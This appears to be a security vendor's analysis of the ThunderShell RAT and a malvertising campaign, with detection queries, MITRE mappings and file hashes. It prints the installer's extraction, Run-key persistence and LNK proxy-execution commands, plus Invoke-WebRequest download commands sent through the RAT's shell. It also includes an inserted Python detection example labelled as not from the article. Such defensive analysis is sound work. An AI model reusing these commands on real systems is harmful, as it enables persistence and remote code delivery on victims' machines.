ThunderShell is an open source[1] Remote Access Tool (RAT) that has reportedly been used in various campaigns since at least March 2022. Variants of ThunderShell are also tracked as Parcel RAT[2], SMOKEDHAM[3] and WorkersDevBackdoor[4]. The RAT can collect sensitive information, capture screenshots, perform keylogging and provide arbitrary command execution on infected systems. In the last quarter of 2023, researchers at eSentire reported a WorkersDevBackdoor campaign targeting organizations in the business services industry[5]. The campaign used malicious online advertisements to mislead users into downloading WorkersDevBackdoor/ThunderShell malware masquerading as legitimate software.
To demonstrate FortiEDR’s ability to detect and mitigate this threat, we detonated the main executable associated with the campaign reported by eSentire to observe the initial infection. Given that the C2 is no longer active, we then built a C2 server in our research lab using files from the ThunderShell GitHub repository[6] and created sample payloads to test in the FortiEDR environment. This allows us to demonstrate how the tool’s various functions are detected and blocked by FortiEDR.
Figure 1. ThunderShell attack flow diagram.
As highlighted above, recent ThunderShell campaigns use fake versions of legitimate free software; one example is the ‘Advanced IP Scanner’ tool. The associated malvertising campaign encourages a victim to download and execute a fake installer. For our testing we used the file ‘Advanced IP Scanner.exe’ (SHA256: 5ad607e76fe170503b522526ef6df6569e0b4c21b7a9ee4a0b92d306cd955ac4).
This executable would be downloaded and executed directly by the victim. It is an installer created with NSIS (Nullsoft Scriptable Install System). NSIS uses an initialization script to drive the installation process, and in this case that script orchestrates the installation of the backdoor. In our analysis environment, the installer process triggered the FortiEDR rule ‘Malicious File Detected’ from the ‘Execution Prevention’ security policy. The rule fired because the installer matches a known malicious file signature in the FortiGuard Threat Intelligence database. Since the executable was marked as malicious, further actions performed by the associated process are blocked, as shown in Figure 2 below.
Figure 2. Fake installer ‘Advanced IP Scanner.exe’ was detected as malicious, and execution was blocked by FortiEDR.
Following execution, the installer begins installing the malware on the victim endpoint. As part of this process several files are extracted to the folder C:\ProgramData\Microsoft\NodejsToolsVsix\. The installer then extracts the contents of the ‘WindowsDev.7z’ archive to the same folder with a portable copy of 7-Zip, using the following command:
C:\ProgramData\Microsoft\NodejsToolsVsix\7z.exe x C:\ProgramData\Microsoft\NodejsToolsVsix\WindowsDev.7z -pY<redacted>na -oC:\ProgramData\Microsoft\NodejsToolsVsix
This command can be observed in FortiEDR threat hunting telemetry as shown in Figure 3.
Figure 3. 7z.exe is used by the malware setup to extract files to the target folder.
Six files were extracted from the WindowsDev.7z archive into the installation folder ‘C:\ProgramData\Microsoft\NodejsToolsVsix’. These files are shown in Figure 4 and their functionality is described in Table 1.
Figure 4. Files extracted from WindowsDev.7z archive.
File | Description
CG6oDkyFHl3R.t | File containing the obfuscated PowerShell payload used by LogConverter.bat
LogConverter.bat | Batch file run by the persistence registry entry
Microsoft.NodejsTools.PressAnyKey.exe | Microsoft utility used for decoy proxy execution
Microsoft.NodejsTools.PressAnyKey | Shortcut file used for decoy proxy execution of LogConverter.bat
NodejsToolsVsix.bat | Executed once by the malicious installer using the decoy proxy execution technique
q8DTE1uLaXRG.t | File containing the obfuscated PowerShell payload used by NodejsToolsVsix.bat
Table 1. Files dropped as part of the malware installation process.
The installer process then created the folder ‘C:\ProgramData\Microsoft\LogConverter’ and copied the extracted files to it. The installer then established persistence by creating a registry value named ‘PressAnyKey’ under the Run key ‘HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ with the data ‘C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk’.
The target of this LNK file is the following command:
C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe abnormal c:\programdata\%username%0 cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat
This command uses the ‘Microsoft.NodejsTools.PressAnyKey.exe’ executable to launch cmd.exe, which runs the commands in the ‘LogConverter.bat’ batch script. ‘Microsoft.NodejsTools.PressAnyKey.exe’ is part of the Microsoft Visual Studio Node.js tools package, and the attacker uses this legitimate binary to proxy execution of ‘LogConverter.bat’. Any process started this way becomes a child of ‘Microsoft.NodejsTools.PressAnyKey.exe’, which makes the process tree look less suspicious.
The LogConverter.bat file runs obfuscated PowerShell code contained in the file ‘CG6oDkyFHl3R.t’. The content of the BAT file is shown in Figure 5.
Figure 5. Content of the malicious LogConverter.bat file.
This code attempts to communicate with the C2 domain ‘cdn-us-tech.wtf-system-4759011.workers.dev’, which resolves to two IP addresses: ‘172.67.164.247’ and ‘104.21.49.163’.
The initial malware setup file is tagged as malicious, and the ‘powershell.exe’ process run by the malware triggers the FortiEDR rule ‘Suspicious Application’ from the ‘Exfiltration Prevention’ security policy. FortiEDR blocked this C2 network communication from PowerShell, as shown in Figure 6 below.
Figure 6. Malicious C2 communication blocked by the FortiEDR.
The C2 associated with the above loader is no longer active, so the behavior of the RAT when executing commands from the C2 could not be observed. To demonstrate FortiEDR’s ability to detect and mitigate ThunderShell in operation, a custom ThunderShell executable ‘IrDGPtJBqDLw.exe’ (SHA1: 4193cc5702dd7e8b2d8caf7bb2c92727b850809e) was created. When this sample was detonated in a virtual machine running FortiEDR, it ran with no visible window and communicated back to its C2, which in our scenario was hosted on another virtual machine in the research lab. This execution triggered the ‘Unconfirmed Executable’ rule from the ‘Exfiltration Prevention’ security policy of FortiEDR. The rule fired because the executable had no known signature, but Fortinet Cloud Services (FCS) integrations with online sandbox and machine learning (ML) engines identified the file as suspicious. The RAT’s network communication to its C2 was blocked by FortiEDR, as seen in Figure 7. Note that, based on the previous analysis, the source process for this behavior in a real infection would be PowerShell; in our emulation the source process is Explorer.exe because the malware was executed directly.
Figure 7. FortiEDR blocks C2 communication of the malicious ThunderShell executable.
When the malicious file communicates back to the C2, the C2 server shows a session established with the victim, as seen in Figure 8 below.
Figure 8. Attacker C2 Panel showing session connected with Victim.
After the initial connection to the C2, the RAT took a screenshot of the victim endpoint and sent it to the C2 server. It was preprogrammed to do this on first execution without any interaction from the attacker. This behavior produces a ‘Screen Capture’ event in FortiEDR Threat Hunting telemetry, as shown in Figure 9 below.
Figure 9. Threat Hunting telemetry showing screenshot taken by malicious executable.
In the C2 server UI, the screenshot tab contains the screenshot taken by the RAT, showing the data available to a potential attacker. This UI and the screenshot can be seen in Figure 10 below.
Figure 10. C2 Panel showing the victim screenshot taken as part of ThunderShell activity.
The attacker can also use the RAT to obtain an interactive shell on the victim from the C2 server. To demonstrate this capability we executed a simple PowerShell command to download an executable from the internet to the victim machine. The command executed through the interactive shell was:
powershell.exe Invoke-WebRequest https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe -OutFile c:\temp\pscp.exe
This command execution from the C2 panel can be seen in Figure 11 below.
Figure 11. ThunderShell C2 panel showing command being sent to the victim.
The RAT executed PowerShell with the given command, which triggered the ‘Suspicious Application’ and ‘Unconfirmed Executable’ rules from the ‘Exfiltration Prevention’ security policy of FortiEDR. These rules fired because PowerShell establishing a network connection is considered suspicious by default. The associated security event can be seen in Figure 12 below.
Figure 12. FortiEDR blocked download of external executable through PowerShell command.
The ThunderShell GitHub documentation states that the tool can run PowerShell commands without invoking PowerShell.exe: a PowerShell command entered at the C2 prompt without a leading PowerShell.exe is executed through unmanaged PowerShell. The malware implements this by loading the Windows ‘System.Management.Automation.ni.dll’ library (the native image of the PowerShell engine assembly) when it starts. The load of this DLL is visible in FortiEDR Threat Hunting telemetry, as shown in Figure 13.
Figure 13. Malware process loading System.Management.Automation.ni.dll.
To test the unmanaged PowerShell functionality, we issued a similar download command from the C2 but without ‘PowerShell.exe’:
Invoke-WebRequest https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe -OutFile c:\temp\pscp2.exe
When this command was executed the target file was downloaded, but no ‘PowerShell.exe’ process appeared in the process chain of this command execution; the malware executable itself communicated with the IP address of the domain above to download the file. Since the executable is detected as malicious, this action was blocked by FortiEDR, as shown in Figure 14.
Figure 14. The malware’s unmanaged PowerShell web request was blocked by FortiEDR.
As highlighted in this article, FortiEDR can effectively detect and mitigate the installation stage of recent WorkersDevBackdoor/ThunderShell campaigns that use malvertising and fake installers. Our analysis shows that the installer was identified as malicious, and execution of the malware and its subsequent behavior would be blocked by default. During analysis FortiEDR was configured in ‘Log Only’ mode so that post-execution behavior could be observed. From the information FortiEDR collected we can see that the fake installer extracted further malicious files, created persistence and then attempted to communicate with the C2, which was detected and mitigated by FortiEDR.
Since the C2 was down, we built a copy of the ThunderShell tool in our analysis environment to demonstrate how FortiEDR detects activity associated with a threat actor using the RAT’s functionality. FortiEDR’s behavior-based detections detected and mitigated the execution of the new, previously unknown ThunderShell payload, C2 communications from the RAT, the external payload download attempt using PowerShell and the screenshot attempt through the RAT.
FortiEDR Threat Hunting queries for detecting ThunderShell behaviors, MITRE ATT&CK mappings for ThunderShell capabilities and the recent campaigns, and IOCs from recent campaigns are included in this article to support proactive threat hunting.
The following threat hunting query detects ‘Value Created’ events where a registry value pointing to the file ‘C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk’ is created under the registry path ‘HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ to achieve persistence. Note that the file name is specific to this campaign and the query may need adjustment for future campaigns.
Type: ("Value Created") AND Registry.Path: ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") AND Registry.Data: ("C\:\\ProgramData\\Microsoft\\LogConverter\\Microsoft.NodejsTools.PressAnyKey.lnk")
The following threat hunting query detects ‘DNS Query’ events whose records reference the C2 domain associated with this campaign. Note that the C2 domain may change in future campaigns and the query may need to be adjusted accordingly. Since this campaign is no longer operating, this query is useful for identifying historic intrusions; the domain can be replaced as threat intelligence on new campaigns becomes available.
Type: ("DNS Query") AND Target.Network.DNS: ("cdn\-us\-tech.wtf\-system\-4759011.workers.dev")
The following threat hunting query detects ‘Process Creation’ events where the target process file name is ‘7z.exe’ and the command line extracts the file ‘C:\ProgramData\Microsoft\NodejsToolsVsix\WindowsDev.7z’. Note that the file name is specific to this campaign and the query may need adjustment for future campaigns.
Type: ("Process Creation") AND Target.Process.File.Name: ("7z.exe") AND Target.Process.CommandLine: ("x C\:\\ProgramData\\Microsoft\\NodejsToolsVsix\\WindowsDev.7z*")
The following threat hunting query detects ‘Process Creation’ events where the executable ‘Advanced_IP_Scanner_2.5.4594.1.exe’ is run from the folder ‘C:\ProgramData\Microsoft\NodejsToolsVsix\’. Normally this type of setup file would not exist in this folder. Note that the file name is specific to this campaign and the query may need adjustment for future campaigns.
Type: ("Process Creation") AND Target.Process.File.Name: ("Advanced_IP_Scanner_2.5.4594.1.exe") AND Target.Process.File.Path: ("ProgramData\\Microsoft\\NodejsToolsVsix\\Advanced_IP_Scanner_2.5.4594.1.exe")
The following threat hunting query detects ‘Process Creation’ events where the ‘Microsoft.NodejsTools.PressAnyKey.exe’ executable is used to run the BAT file ‘C:\ProgramData\Microsoft\NodejsToolsVsix\NodejsToolsVsix.bat’ through ‘cmd.exe’. Note that the file name is specific to this campaign and the query may need adjustment for future campaigns.
Type: ("Process Creation") AND Source.Process.Name: ("Microsoft.NodejsTools.PressAnyKey.exe") AND Target.Process.File.Name: ("cmd.exe") AND Target.Process.CommandLine: ("\/c \"\"C\:\\ProgramData\\Microsoft\\NodejsToolsVsix\\NodejsToolsVsix.bat\"\"")
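As an added example (not code from this article or from Fortinet), the following Python applies the four hunting queries above, including the Run-key LNK persistence chain described earlier, to constructed telemetry events, and goes beyond the page by adding two generalised rules that drop the campaign-specific file names. The field names are those used in the queries; the match semantics (case-insensitive, trailing ‘*’ wildcard, ‘re:’ regex prefix) are this example’s own assumption, not FortiEDR’s documented query grammar.

```python
import re

# Campaign-specific rules transcribed from the article's four queries with the
# query-language escaping removed. Match semantics are this example's assumption,
# not FortiEDR's: case-insensitive; trailing '*' = any suffix; 're:' = regex.
RULES = {
    "run_key_lnk_persistence": {"Type": "Value Created",
        "Registry.Path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
        "Registry.Data": r"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"},
    "c2_dns_query": {"Type": "DNS Query",
        "Target.Network.DNS": "cdn-us-tech.wtf-system-4759011.workers.dev"},
    "7z_extract_windowsdev": {"Type": "Process Creation", "Target.Process.File.Name": "7z.exe",
        "Target.Process.CommandLine": r"x C:\ProgramData\Microsoft\NodejsToolsVsix\WindowsDev.7z*"},
    "pressanykey_proxy_cmd": {"Type": "Process Creation", "Target.Process.File.Name": "cmd.exe",
        "Source.Process.Name": "Microsoft.NodejsTools.PressAnyKey.exe",
        "Target.Process.CommandLine": r'/c ""C:\ProgramData\Microsoft\NodejsToolsVsix\NodejsToolsVsix.bat""'},
    # Generalised variants (this example's own, not from the article) that drop
    # the file names the article says will change between campaigns.
    "run_key_lnk_in_programdata": {"Type": "Value Created",
        "Registry.Path": r"re:\\CurrentVersion\\Run$",
        "Registry.Data": r"re:^[a-z]:\\programdata\\.*\.lnk$"},
    "cmd_runs_bat_from_programdata": {"Type": "Process Creation",
        "Target.Process.File.Name": "cmd.exe",
        "Target.Process.CommandLine": r're:/c\s+"*[a-z]:\\programdata\\.*\.bat'},
}

def field_matches(value: str, pattern: str) -> bool:
    """Case-insensitive match of one event field against one pattern."""
    v, p = value.lower(), pattern.lower()   # regexes above use no case-sensitive escapes
    if p.startswith("re:"):
        return re.search(p[3:], v) is not None
    if p.endswith("*"):
        return v.startswith(p[:-1])
    return v == p

def match_rules(event: dict) -> list:
    """Sorted names of every rule whose fields all match this event."""
    return sorted(name for name, fields in RULES.items()
                  if all(field_matches(str(event.get(f, "")), p)
                         for f, p in fields.items()))

def hunt(events) -> dict:
    """Map event id -> matching rule names, keeping only events with a hit."""
    return {e["id"]: hits for e in events if (hits := match_rules(e))}

# Constructed sample telemetry: 1-4 mirror the article's observations, 5 is a
# benign 7-Zip extraction, 6 imitates a future campaign with new file names.
SAMPLE_EVENTS = [
    {"id": 1, "Type": "Value Created",
     "Registry.Path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "Registry.Data": r"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"},
    {"id": 2, "Type": "Process Creation", "Target.Process.File.Name": "7z.exe",
     "Target.Process.CommandLine": r"x C:\ProgramData\Microsoft\NodejsToolsVsix\WindowsDev.7z -pREDACTED -oC:\ProgramData\Microsoft\NodejsToolsVsix"},
    {"id": 3, "Type": "DNS Query", "Target.Network.DNS": "cdn-us-tech.wtf-system-4759011.workers.dev"},
    {"id": 4, "Type": "Process Creation", "Target.Process.File.Name": "cmd.exe",
     "Source.Process.Name": "Microsoft.NodejsTools.PressAnyKey.exe",
     "Target.Process.CommandLine": r'/c ""C:\ProgramData\Microsoft\NodejsToolsVsix\NodejsToolsVsix.bat""'},
    {"id": 5, "Type": "Process Creation", "Target.Process.File.Name": "7z.exe",
     "Target.Process.CommandLine": r"x C:\Users\alice\Downloads\photos.7z"},
    {"id": 6, "Type": "Process Creation", "Target.Process.File.Name": "cmd.exe",
     "Source.Process.Name": "explorer.exe",
     "Target.Process.CommandLine": r"/c C:\ProgramData\Contoso\Updater\update.bat"},
]
HITS = hunt(SAMPLE_EVENTS)   # event 5 is absent; event 6 hits only the generalised rule
```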
Note: The indicators listed under observed activity for each MITRE technique are relevant to the analyzed campaigns and may change in future campaigns.
Technique ID | Technique Description | Observed Activity
T1059.001 | Command and Scripting Interpreter: PowerShell | The main ThunderShell process uses unmanaged PowerShell to run PowerShell commands received from the C2 server. The PowerShell DLL System.Management.Automation.ni.dll is loaded by the main ThunderShell process at start-up.
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The WorkersDevBackdoor campaign outlined in this article uses .BAT files for initial execution and installation, as well as for the persistence mechanism implemented through a registry run key.
Technique ID | Technique Description | Observed Activity
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The malware creates an entry named ‘PressAnyKey’ under the registry path ‘HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ for persistence. The run key triggers a .LNK file which launches ‘Microsoft.NodejsTools.PressAnyKey.exe’ for proxy execution of the malicious batch file.
T1546.016 | Event Triggered Execution: Installer Packages | The WorkersDevBackdoor campaign outlined in this article uses a customized installer package built with NSIS for initial execution and to establish persistence of the malware.
Technique ID | Technique Description | Observed Activity
T1564.003 | Hide Artifacts: Hidden Window | The initial installer payload runs a batch script with a hidden window during the initial infection.
T1027 | Obfuscated Files or Information | Some of the malicious files used by the installer in the WorkersDevBackdoor campaign described in this article are stored in a password-protected 7-Zip archive and extracted before execution.
T1480 | Execution Guardrails | The initial installation script from the WorkersDevBackdoor campaign described in this article checks whether the victim endpoint is domain joined. If the endpoint is not part of a domain, execution is halted.
T1218 | System Binary Proxy Execution | The malicious batch file is executed using the Visual Studio NodejsTools utility ‘Microsoft.NodejsTools.PressAnyKey.exe’.
T1127 | Trusted Developer Utilities Proxy Execution | The malicious batch file called through run key registry persistence is proxy-executed through the Visual Studio NodejsTools utility ‘Microsoft.NodejsTools.PressAnyKey.exe’.
T1036.004 | Masquerading: Masquerade Task or Service | The malware installs its initial files in the folder ‘ProgramData\Microsoft\NodejsToolsVsix’, likely to appear benign.
Technique ID | Technique Description | Observed Activity
T1113 | Screen Capture | After initial execution the ThunderShell RAT can be configured to capture a screenshot of the victim endpoint.
Technique ID | Technique Description | Observed Activity
T1573 | Encrypted Channel | C2 communication is encrypted with symmetric encryption; the encryption key is created when the C2 server is installed.
T1071.001 | Application Layer Protocol: Web Protocols | C2 communication is implemented through web requests.
Technique ID | Technique Description | Observed Activity
T1583.008 | Acquire Infrastructure: Malvertising | Attackers employed malvertising on Google and Bing to spread the malicious executable.
Indicator Description | Indicator | Indicator Type | Associated Tactic | Notes | First Observed
Malicious Executable | 4193cc5702dd7e8b2d8caf7bb2c92727b850809e | SHA1 Hash | Installation | ThunderShell malicious payload exe | 2024-03-14
Malicious Executable | 2fd58eb634dbbc46d2ecde8b454db46180754e97a8de6c54c05b4ec815d3df95 | SHA256 Hash | Installation | ThunderShell malicious payload exe | 2024-03-14
Malicious Executable | | SHA1 Hash | Installation | Malicious Installer file | 2023-11-24
Malicious Executable | 5ad607e76fe170503b522526ef6df6569e0b4c21b7a9ee4a0b92d306cd955ac4 | SHA256 Hash | Installation | Malicious Installer file | 2023-11-24
Malicious Executable | 80a31d1e3aa4ad6af5822db51ec81a4c369d6d44 | SHA1 Hash | Installation | Malicious LogConverter.bat file | 2023-11-21
Malicious Executable | 6904134d19c0ec227bf0a3d94a7f4c135bc00a3938243c2ae457669937e86ce8 | SHA256 Hash | Installation | Malicious LogConverter.bat file | 2023-11-21
Malicious Executable | aad661e73a45dd53b321c61e611f4087367fabe2 | SHA1 Hash | Installation | Malicious NodejsToolsVsix.bat file | 2023-11-21
Malicious Executable | 3cdd421716ae64b4bad46611eb3df599c5a52a76a85f83b60843b3f0f5d3ac3b | SHA256 Hash | Installation | Malicious NodejsToolsVsix.bat file | 2023-11-21
Malicious Executable | 21e662472c7a99b6b42a29a3ed99964da8815f87 | SHA1 Hash | Installation | Obfuscated payload CG6oDkyFHl3R.t | 2023-11-21
Malicious Executable | 7b5ccf47f25f0d128afae580d82b16473ea48f7a755ac77a472ab355596b8310 | SHA256 Hash | Installation | Obfuscated payload CG6oDkyFHl3R.t | 2023-11-21
Malicious Executable | 6bb1a08ebb97f4c676b37dcaa33d751c46674cd7 | SHA1 Hash | Installation | Obfuscated payload q8DTE1uLaXRG.t | 2023-11-21
Malicious Executable | 19b94b5efa1f75627827dced924849c15f4b4c1dfd72cf1c72990a611ee54338 | SHA256 Hash | Installation | Obfuscated payload q8DTE1uLaXRG.t | 2023-11-21
[1] https://github.com/Mr-Un1k0d3r/ThunderShell/tree/master
[2] https://www.connectwise.com/resources/parcel-rat
[3] https://www.mandiant.com/resources/blog/shining-a-light-on-darkside-ransomware-operations
[4] https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising
[5] https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising
Copyright 2024 Fortinet, Inc. All Rights Reserved.